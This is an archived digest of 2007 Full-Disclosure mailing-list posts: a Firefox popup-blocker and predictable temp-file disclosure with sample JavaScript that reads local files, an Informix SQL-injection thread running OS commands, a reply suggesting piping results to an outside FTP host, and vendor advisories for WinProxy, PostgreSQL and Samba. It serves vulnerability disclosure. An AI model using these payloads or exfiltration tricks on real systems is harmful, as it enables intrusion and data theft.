[Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops

2007-02-05 Thread Michal Zalewski 
There is an interesting vulnerability in the default behavior of Firefox
builtin popup blocker. This vulnerability, coupled with an additional
trick, allows the attacker to read arbitrary user-accessible files on the
system, and thus steal some fairly sensitive information.

This was tested on 1.5.0.9.

For security reasons, Firefox does not allow Internet-originating websites
to access the file:// namespace. When the user chooses to manually allow a
blocked popup however, normal URL permission checks are bypassed. The
attacker may fool the browser to parse a chosen HTML document stored on
the local filesystem, and because Firefox security manager treats all
file:/// URLs as having "same origin", such a document could read other
local files at its discretion with the use of XMLHttpRequest, and relay
that information to a remote server.

Now, to make the attack effective, the attacker would need to plant a
predictably named file with exploit code on the target system.  This
sounds hard, but isn't: Firefox sometimes creates outright deterministic
temporary filenames in system-wide temporary directory when opening files
with external applications; even if we ignore this possibility (since it
requires the user to take an additional step that may be difficult to
justify), "random" temporary files are created using a flawed algorithm in
nsExternalAppHandler::SetUpTempFile and other locations.

The problem here is that stdlib linear congruential PRNG (srand/rand) is
seeded immediately prior to file creation with current time in seconds
(actually, microseconds, but divided by 1e6); rand() is then used in
direct succession to produce an "unpredictable" file name. Normally, were
the PRNG seeded once on program start and then subsequently invoked,
results would be deterministic, but difficult to blindly predict in the
real world; but here, the job is much easier: we know when the download
start, we know what the seed would be, and how many subsequent calls to it
are made - we know the output.

In a different setting, there would be a level of uncertainty caused by
the fact that system clocks tend to drift or have imprecise settings
(although today, most Windows systems either synchronize with Windows
Time, or domain time services, so this is less of a factor). Still,
there's a yet another nail to the coffin: on first call, Javascript
Math.random() is seeded using the same call in the same manner, PR_Now()
* 1e-6. The seed, and hence a time very close to the moment of file
creation, can be trivially computed by analyzing Math.random() output. But
wait, why bother at all - Javascript can be used to directly read system
clock with a 1-second resolution.

One of several attack scenarios I could think of might look as follows:

  1) Have user click on a link on a malicious page. The link would point
 to "evil.cgi", and have onClick handler set to function foo().
 This function would acquire current system time, and use setTimeout to
 invoke window.open("p2.html?" + curtime,"new",""); in 100 ms. The
 aforementioned cgi script would return:

 Content-type: text/html
 Content-disposition: attachment; filename="foo.html"

 
 x = new XMLHttpRequest;
 x.open("GET", "file:///c:/BOOT.ini", false);
 x.send(null);
 alert("The script attempted to read your C:/BOOT.ini:\n\n"
   + x.responseText);
 

  2) After user clicks the link, a download prompt will appear, and a copy
 of evil.cgi output would be saved in - for example -
 C:\WINDOWS\TEMP\c3o89nr7.htm. The download prompt will be immediately
 hidden under the newly created p2.html window (this, by default,
 bypasses popup blocker. because the window is created in response to
 user action).

  3) The page currently displayed on top, p2.html, instructs the user to
 accept the popup to open a movie player or whatnot; since unsolicited
 popups are an annoyance, not a security risk, even an educated user
 is likely to comply.

 To create a popup warning, a script embedded on the page calls:
 window.open('file:///c:/windows/temp/xxx.htm','new2',''),
 with a name calculated by repeating a procedure implemented in
 SetUpTempFile() with a seed calculated by the server based on
 reported system time (p2.html?time).

  4) When the user opens that particular popup, attacker-supplied HTML
 file is loaded and executed with local file read privileges (in the
 aforementioned example, the contents of BOOT.ini file would be
 reported back to the victim).

(Ta-dah!)

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops

2007-02-05 Thread Michal Zalewski 
On Mon, 5 Feb 2007, pdp (architect) wrote:

> You may as well use a QuickTime .mov/.qtl or a PDF document to open a
> file:// link . I think it is easier.

Sure. You can probably have a file:// link in Open Office / MS Office
documents as well; but these all rely on external components, and as such,
attacks could be shrugged off as a weakness in these apps (and there's
some truth to this).

Browser authors know better, and they disallow file:// URLs from the
Internet ever since Javascript became so powerful; this case managed to
slip through, so I thought it's a neat example, in conjunction with
deterministic temporary files.

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops

2007-02-05 Thread pdp (architect) 
Hi Michal,

Nice read! Very complicated though and with too many "If"s, but very
interesting. I just want to sum up. As long as the user has a
malicious html file stored on their system you know the path to it,
the attacker can read local files. You don't need to do this pop-up
trick at all. You may as well use a QuickTime .mov/.qtl or a PDF
document to open a file:// link . I think it is easier.

Nice work.

On 2/5/07, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> There is an interesting vulnerability in the default behavior of Firefox
> builtin popup blocker. This vulnerability, coupled with an additional
> trick, allows the attacker to read arbitrary user-accessible files on the
> system, and thus steal some fairly sensitive information.
>
> This was tested on 1.5.0.9.
>
> For security reasons, Firefox does not allow Internet-originating websites
> to access the file:// namespace. When the user chooses to manually allow a
> blocked popup however, normal URL permission checks are bypassed. The
> attacker may fool the browser to parse a chosen HTML document stored on
> the local filesystem, and because Firefox security manager treats all
> file:/// URLs as having "same origin", such a document could read other
> local files at its discretion with the use of XMLHttpRequest, and relay
> that information to a remote server.
>
> Now, to make the attack effective, the attacker would need to plant a
> predictably named file with exploit code on the target system.  This
> sounds hard, but isn't: Firefox sometimes creates outright deterministic
> temporary filenames in system-wide temporary directory when opening files
> with external applications; even if we ignore this possibility (since it
> requires the user to take an additional step that may be difficult to
> justify), "random" temporary files are created using a flawed algorithm in
> nsExternalAppHandler::SetUpTempFile and other locations.
>
> The problem here is that stdlib linear congruential PRNG (srand/rand) is
> seeded immediately prior to file creation with current time in seconds
> (actually, microseconds, but divided by 1e6); rand() is then used in
> direct succession to produce an "unpredictable" file name. Normally, were
> the PRNG seeded once on program start and then subsequently invoked,
> results would be deterministic, but difficult to blindly predict in the
> real world; but here, the job is much easier: we know when the download
> start, we know what the seed would be, and how many subsequent calls to it
> are made - we know the output.
>
> In a different setting, there would be a level of uncertainty caused by
> the fact that system clocks tend to drift or have imprecise settings
> (although today, most Windows systems either synchronize with Windows
> Time, or domain time services, so this is less of a factor). Still,
> there's a yet another nail to the coffin: on first call, Javascript
> Math.random() is seeded using the same call in the same manner, PR_Now()
> * 1e-6. The seed, and hence a time very close to the moment of file
> creation, can be trivially computed by analyzing Math.random() output. But
> wait, why bother at all - Javascript can be used to directly read system
> clock with a 1-second resolution.
>
> One of several attack scenarios I could think of might look as follows:
>
>   1) Have user click on a link on a malicious page. The link would point
>  to "evil.cgi", and have onClick handler set to function foo().
>  This function would acquire current system time, and use setTimeout to
>  invoke window.open("p2.html?" + curtime,"new",""); in 100 ms. The
>  aforementioned cgi script would return:
>
>  Content-type: text/html
>  Content-disposition: attachment; filename="foo.html"
>
>  
>  x = new XMLHttpRequest;
>  x.open("GET", "file:///c:/BOOT.ini", false);
>  x.send(null);
>  alert("The script attempted to read your C:/BOOT.ini:\n\n"
>+ x.responseText);
>  
>
>   2) After user clicks the link, a download prompt will appear, and a copy
>  of evil.cgi output would be saved in - for example -
>  C:\WINDOWS\TEMP\c3o89nr7.htm. The download prompt will be immediately
>  hidden under the newly created p2.html window (this, by default,
>  bypasses popup blocker. because the window is created in response to
>  user action).
>
>   3) The page currently displayed on top, p2.html, instructs the user to
>  accept the popup to open a movie player or whatnot; since unsolicited
>  popups are an annoyance, not a security risk, even an educated user
>  is likely to comply.
>
>  To create a popup warning, a script embedded on the page calls:
>  window.open('file:///c:/windows/temp/xxx.htm','new2',''),
>  with a name calculated by repeating a procedure implemented in
>  SetUpTempFile() with a seed calculated by the server based on
>  reported system time (p2.html?time).
>
>   4) When the user opens that particular popup, attack

Re: [Full-disclosure] Web 2.0 backdoors made easy with MSIE & XMLHttpRequest

2007-02-05 Thread Troy Cregger 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

>> The 2005 text does briefly mention "Accessing content / web-scanning" 
>> (take a look at Notes 1-3).
>> 
>> So the problem is much older.

Well, that's Micro$loth for ya.

Amit Klein wrote:
> Michal Zalewski wrote:
>> On Sat, 3 Feb 2007, Michal Zalewski wrote:
>>
>>   
>>>   xmlhttp.open("GET\thttp://dione.ids.pl/\tHTTP/1.0\n\n";, "x",true);
>>> 
>> Funny enough, Paul Szabo was quick to point out that Amit Klein found the
>> same vector that I used here for client-side backdoors in May 2006 (still
>> not patched?! *shrieks in horror*), but for cache poisoning:
>>
>>   "IE + some popular forward proxy servers = XSS, defacement (browser cache 
>> poisoning)"
>>   http://www.securityfocus.com/archive/1/434931
>>
>> This is getting depressing. May 2006.
>>
>>   
> Much worse. The basic technique already appeared in two of my previous 
> write-ups:
> 
> "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a 
> lot more..." (September 2005)
> http://www.securityfocus.com/archive/1/411585
> 
> "XS(T) attack variants which can, in some cases, eliminate the need for 
> TRACE " (January 2003)
> http://www.securityfocus.com/archive/107/308433
> 
> The 2005 text does briefly mention "Accessing content / web-scanning" 
> (take a look at Notes 1-3).
> 
> So the problem is much older.
> 
> Thanks,
> -Amit
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFFx0j9nBEWLrrYRl8RAuzDAJ9j7ucnNaYlD7qXuFOsvwirZ4+WGwCfaupB
6WNArFbS1cB+5CRbYvkh/go=
=4eMy
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 02.02.07: Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability

2007-02-05 Thread iDefense Labs 
Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability

iDefense Security Advisory 02.02.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 02, 2007

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small to
medium businesses. In addition to internet sharing Winproxy also hosts a
series of security, anti-spam and anti-spyware capabilities. More
information can be located at the link shown below.

http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s WinProxy
allows attackers to trigger a heap corruption vulnerability.  

The vulnerability can be triggered by sending an overly long HTTP CONNECT
request to WinProxy's HTTP proxy service.

III. ANALYSIS

Exploitation allows an attacker to cause a denial of service condition or
potentially execute arbitrary code.

Overly long payloads will result in a non-exploitable DoS condition.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.1a and 6.0 r1c. All
previous versions are suspected vulnerable.

V. WORKAROUND

Disabling the WinProxy HTTP protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat Systems has addressed this vulnerability within version 6.1r1c of
WinProxy.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

08/16/2006  Initial vendor notification
09/19/2006  Initial vendor response
12/06/2006  Second vendor notification
02/02/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Manuel Santamarina Suarez
aka 'FistFuXXer'.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of
iDefense. If you wish to reprint the whole or any part of this alert in
any other medium other than electronically, please e-mail
[EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-417-1] PostgreSQL vulnerabilities

2007-02-05 Thread Martin Pitt 
=== 
Ubuntu Security Notice USN-417-1  February 05, 2007
postgresql-7.4/-8.0/-8.1 vulnerabilities
CVE-2007-0555, CVE-2007-0556
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  postgresql-7.4   1:7.4.8-17ubuntu1.4
  postgresql-8.0   8.0.3-15ubuntu2.3

Ubuntu 6.06 LTS:
  postgresql-8.1   8.1.4-0ubuntu1.2

Ubuntu 6.10:
  postgresql-8.1   8.1.4-7ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Jeff Trout discovered that the PostgreSQL server did not sufficiently
check data types of SQL function arguments in some cases. An
authenticated attacker could exploit this to crash the database server
or read out arbitrary locations in the server's memory, which could
allow retrieving database content the attacker should not be able to
see. (CVE-2007-0555)

Jeff Trout reported that the query planner did not verify that a table
was still compatible with a previously made query plan. By using ALTER
COLUMN TYPE during query execution, an attacker could exploit this to
read out arbitrary locations in the server's memory, which could allow
retrieving database content the attacker should not be able to see.
(CVE-2007-0556)


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/postgresql-7.4_7.4.8-17ubuntu1.4.diff.gz
  Size/MD5:61660 f0b8038e545f4cac15356c31e8a45d57

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/postgresql-7.4_7.4.8-17ubuntu1.4.dsc
  Size/MD5: 1038 7f3660a4b9f9e427f6acea9f475e1d31

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/postgresql-7.4_7.4.8.orig.tar.gz
  Size/MD5:  9947820 50ee979019622f8852444cfd67b58e7e

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3-15ubuntu2.3.diff.gz
  Size/MD5:68920 011160d5414c9a25bdf904484c6549a4

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3-15ubuntu2.3.dsc
  Size/MD5: 1115 972244c3e7fdba5d92963a757ab60d8b

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3.orig.tar.gz
  Size/MD5: 10786924 73c804e7e55dd916732ce6807cc13318

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/postgresql-doc-7.4_7.4.8-17ubuntu1.4_all.deb
  Size/MD5:  1062840 27ed7b68501e2b0bd549f7e671a1433a

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/postgresql-doc-8.0_8.0.3-15ubuntu2.3_all.deb
  Size/MD5:  1170106 56e437def51d06712e899fe95ff4c085

http://security.ubuntu.com/ubuntu/pool/universe/p/postgresql-7.4/postgresql-server-dev-7.4_7.4.8-17ubuntu1.4_all.deb
  Size/MD5:   423444 709e6862b1dd30176be73fe8e7b9feac

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/libecpg-compat2_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:19312 a309220068cb4f004f98a48ff50d46b4

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/libecpg-dev_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:   204278 7c92c4c12a4f8f83ecf62eb243ce4c9a

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/libecpg5_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:38918 16e646bb44621e70428afd5c850e038c

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/libpgtypes2_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:41548 d8443eb231abf71159c89b082fb17b54

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/libpq-dev_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:   165732 26d8575709e4c8699c4ff6f5a29436c4

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/libpq3_7.4.8-17ubuntu1.4_amd64.deb
  Size/MD5:68958 857605f6bf5ca9ee19817cf0753ae9e9

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/libpq4_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:72506 8c2ca61ed2e20f8336d3b1a70ddea82c

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/postgresql-7.4_7.4.8-17ubuntu1.4_amd64.deb
  Size/MD5:  2744164 c9f09ae5f20aa52bf4d01ea55ac3312c

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3-15ubuntu2.3_amd64.deb
  Size/MD5:  2985170 e1289e644e3ac33e067250784c6af317

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-7.4/postgresql-client-7.4_7.4.8-17ubuntu1.4_amd64.deb
  Size/MD5:   472818 3965c03011c50fec137eefb6ee1dc1d2

http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.0

Re: [Full-disclosure] [Full-Disclosure] (Psexec on *NIX)

2007-02-05 Thread Marcello Barnaba 
On Monday 05 February 2007 01:20, Q-Ball wrote:
> Key-based logon is a bad idea in general because afaik, it's not
> possible to implement any type of password policy on those keys.

$ ssh-keygen -h 2>&1 | grep pass
  -N phrase   Provide new passphrase.
  -P phrase   Provide old passphrase.
  -p  Change passphrase of private key file.

-- 
pub 1024D/8D2787EF  723C 7CA3 3C19 2ACE  6E20 9CC1 9956 EB3C 8D27 87EF


pgpyEv8GGa562.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Informix SQL injection

2007-02-05 Thread Joshua Tagnore 

List,

   I'm doing a pentest on a website that uses informix web datablade and
found a sql injection point. I have been able to use the webexplode() stored
procedure to execute any SQL commands, and also operating system commands
using SYSTEM. The problem I have is that SYSTEM doesnt return the execution
result(its a procedure, not a function), so I have to save them to a file;
for example : SYSTEM 'ls /etc/ > /tmp/result' and then read that file... the
problem is... how do i read that file ? I have tried with "load from ..."
and it fails with a sintax error, and on the other side, when I use
FILETOCLOB('/tmp/result','server') i dont know how to get the contents of
the CLOB... anyone knows something informix ?

Cheers,

--
Joshua Tagnore
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Informix SQL injection

2007-02-05 Thread Tyop? 
On 2/5/07, Joshua Tagnore <[EMAIL PROTECTED]> wrote:
> List,
>
> I'm doing a pentest on a website that uses informix web datablade and
> found a sql injection point. I have been able to use the webexplode() stored
> procedure to execute any SQL commands, and also operating system commands
> using SYSTEM. The problem I have is that SYSTEM doesnt return the execution
> result(its a procedure, not a function), so I have to save them to a file;
> for example : SYSTEM 'ls /etc/ > /tmp/result' and then read that file... the
> problem is... how do i read that file ? I have tried with "load from ..."
> and it fails with a sintax error, and on the other side, when I use
> FILETOCLOB('/tmp/result','server') i dont know how to get
> the contents of the CLOB... anyone knows something informix ?
>
> Cheers,

Create a file with a list of commands,
and "cat \"your_file\" | ftp ftp.mydomain.com [port]"

My 2cts.

-- 
GUASCONI Vincent
Etudiant.
http://altmylife.blogspot.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1257-1] New samba packages fix several vulnerabilities

2007-02-05 Thread Moritz Muehlenhoff 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1257-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
February 5th, 2007  http://www.debian.org/security/faq
- --

Package: samba
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2007-0452 CVE-2007-0454 

Several remote vulnerabilities have been discovered in samba, a free
implementation of the SMB/CIFS protocol, which may lead to the execution
of arbitrary code or denial of service. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2007-0452

It was discovered that incorrect handling of deferred file open calls
may lead to an infinite loop, which results in denial of service.

CVE-2007-0454

"zybadawg333" discovered that the AFS ACL mapping VFS plugin performs
insecure format string handling, which may lead to the execution of
arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 3.0.14a-3sarge4.

For the upcoming stable distribution (etch) these problems have been
fixed in version 3.0.23d-5.

For the unstable distribution (sid) these problems have been fixed in
version 3.0.23d-5.

We recommend that you upgrade your samba package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge4.dsc
  Size/MD5 checksum: 1081 e31451e53dc1183440dd1c01f1f4d8bd

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge4.diff.gz
  Size/MD5 checksum:   115542 122eb7e1092f1664e0988a172dde49ba

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a.orig.tar.gz
  Size/MD5 checksum: 15605851 ebee37e66a8b5f6fd328967dc09088e8

  Architecture independent components:


http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.14a-3sarge4_all.deb
  Size/MD5 checksum: 12117006 428b452562de4a6d2795884c74174bba

  Alpha architecture:


http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:   401226 ed1513a6d5dd3a208cf9e84e824576a1

http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:   659264 5437692a3433b5da9d6f7cca0ae31310

http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  1014026 c89075de31bd0c5b369c1f1991faeab4

http://security.debian.org/pool/updates/main/s/samba/python2.3-samba_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  5231866 0ce699ad269ed26e0996326d1a60fdc6

http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  3126076 3e9ff19d65e609ae9e318f97ffb3af1a

http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  2406170 cdd82ccac3caad5faf3870c02ffe64e3

http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum: 20261304 137818bb48718533dd7d253ee8b8a4d2

http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  3247978 ee1cb7cd162e40784214c435a1e63a89

http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:   458542 16e0d4c7545dcafaf3c0e1d80e36e00e

http://security.debian.org/pool/updates/main/s/samba/swat_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  4222536 9921fbf27e8bb38c7d2e38b7f23ee3b4

http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.14a-3sarge4_alpha.deb
  Size/MD5 checksum:  1822012 14bf0809e5c6405f54ba731c746b9c44

  AMD64 architecture:


http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.14a-3sarge4_amd64.deb
  Size/MD5 checksum:   380778 0378f51516ff104a740f1a6644d0f9ea

http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.14a-3sarge4_amd64.deb
  Size/MD5 checksum:   599290 58a5cd47d9aec39479c7c62d30cf4932

http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.14a-3sarge4_amd64.deb
  Size/MD5 checksum:

[Full-disclosure] [ MDKSA-2007:034 ] - Updated samba packages address multiple vulnerabilities

2007-02-05 Thread security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:034
 http://www.mandriva.com/security/
 ___
 
 Package : samba
 Date: February 5, 2007
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A logic error in the deferred open code for smbd may allow an
 authenticated user to exhaust resources such as memory and CPU on the
 server by opening multiple CIFS sessions, each of which will normally
 spawn a new smbd process, and sending each connection into an infinite
 loop. (CVE-2007-0452)

 The name of a file on the server's share is used as the format string
 when setting an NT security descriptor through the afsacl.so VFS
 plugin. (CVE-2007-0454)

 Updated packages have been patched to address these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0452
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0454
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 1b530594d9d6bf0a0a4b974d9c61fb94  
2006.0/i586/libsmbclient0-3.0.20-3.2.20060mdk.i586.rpm
 12a3694d0ecfe2c7327393e88da54806  
2006.0/i586/libsmbclient0-devel-3.0.20-3.2.20060mdk.i586.rpm
 9847f27829d38428d9e7b8b14f97de49  
2006.0/i586/libsmbclient0-static-devel-3.0.20-3.2.20060mdk.i586.rpm
 31fa2a33fbd83b5db9d04210104e7360  
2006.0/i586/mount-cifs-3.0.20-3.2.20060mdk.i586.rpm
 8463d92295c0834802f9548fe4942a9b  
2006.0/i586/nss_wins-3.0.20-3.2.20060mdk.i586.rpm
 efbce43af5682f5ac8b09c21bb44dd1b  
2006.0/i586/samba-client-3.0.20-3.2.20060mdk.i586.rpm
 1b4216e9f7cb33ff0d83f6f6154932cb  
2006.0/i586/samba-common-3.0.20-3.2.20060mdk.i586.rpm
 76659405c7b4ac3d2bf9aba245637d64  
2006.0/i586/samba-doc-3.0.20-3.2.20060mdk.i586.rpm
 968284cf40359ff00ad3011fb2eb9746  
2006.0/i586/samba-passdb-mysql-3.0.20-3.2.20060mdk.i586.rpm
 22b8c6f6df2e334689fb075ce50249f7  
2006.0/i586/samba-passdb-pgsql-3.0.20-3.2.20060mdk.i586.rpm
 bf5433f0ebfa4316ed12344f29d65bb2  
2006.0/i586/samba-passdb-xml-3.0.20-3.2.20060mdk.i586.rpm
 d1c79404fafd39db117e3f03852d8f98  
2006.0/i586/samba-server-3.0.20-3.2.20060mdk.i586.rpm
 f8e0c598ebee64f19e22758f73eeaede  
2006.0/i586/samba-smbldap-tools-3.0.20-3.2.20060mdk.i586.rpm
 5a1f9acb75709a958a87de121ffee236  
2006.0/i586/samba-swat-3.0.20-3.2.20060mdk.i586.rpm
 e9b0e4aa373e3d37c520447366f56710  
2006.0/i586/samba-vscan-clamav-3.0.20-3.2.20060mdk.i586.rpm
 1edc664ebced1683a7a62eb7d60bc341  
2006.0/i586/samba-vscan-icap-3.0.20-3.2.20060mdk.i586.rpm
 1c74716b5b8d2605f2c497720831d180  
2006.0/i586/samba-winbind-3.0.20-3.2.20060mdk.i586.rpm 
 c35b130dac78cd9f892351a670d903a4  
2006.0/SRPMS/samba-3.0.20-3.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 d0303faed0767e3874b138662049ae88  
2006.0/x86_64/lib64smbclient0-3.0.20-3.2.20060mdk.x86_64.rpm
 05cbbaa507003fbed1f789fd92539350  
2006.0/x86_64/lib64smbclient0-devel-3.0.20-3.2.20060mdk.x86_64.rpm
 a65750a7b2485c3fa00d2286d299b0ba  
2006.0/x86_64/lib64smbclient0-static-devel-3.0.20-3.2.20060mdk.x86_64.rpm
 663b53e302dc2db8015b8206e79e4a28  
2006.0/x86_64/mount-cifs-3.0.20-3.2.20060mdk.x86_64.rpm
 da521e66365c906bf8dbaf1a311fffde  
2006.0/x86_64/nss_wins-3.0.20-3.2.20060mdk.x86_64.rpm
 b87484e5a5dff12619b4ac148adb9dc8  
2006.0/x86_64/samba-client-3.0.20-3.2.20060mdk.x86_64.rpm
 6bc67acab757d473aafdd75f4bfe89da  
2006.0/x86_64/samba-common-3.0.20-3.2.20060mdk.x86_64.rpm
 9ff68bbba6e53f65850910fd90002a02  
2006.0/x86_64/samba-doc-3.0.20-3.2.20060mdk.x86_64.rpm
 fb0ebdc18bb7a8dbf975847b83c67351  
2006.0/x86_64/samba-passdb-mysql-3.0.20-3.2.20060mdk.x86_64.rpm
 d936bd945847eee84cff46bb06bafde7  
2006.0/x86_64/samba-passdb-pgsql-3.0.20-3.2.20060mdk.x86_64.rpm
 168d8d337225b41db957b4331324d7d5  
2006.0/x86_64/samba-passdb-xml-3.0.20-3.2.20060mdk.x86_64.rpm
 03de0ab9fa0c7441cf0e232bc5af5f4b  
2006.0/x86_64/samba-server-3.0.20-3.2.20060mdk.x86_64.rpm
 94147f52697abed4711b56004bae7488  
2006.0/x86_64/samba-smbldap-tools-3.0.20-3.2.20060mdk.x86_64.rpm
 caf8a9f3f9345ce6d736332201bd89dd  
2006.0/x86_64/samba-swat-3.0.20-3.2.20060mdk.x86_64.rpm
 a1b625278ce98c6f9d156b98e0164768  
2006.0/x86_64/samba-vscan-clamav-3.0.20-3.2.20060mdk.x86_64.rpm
 070d34b18cd6fb5ff0728b7ae313fb38  
2006.0/x86_64/samba-vscan-icap-3.0.20-3.2.20060mdk.x86_64.rpm
 3a6c127079aa9a99aa5d6672d47876af  
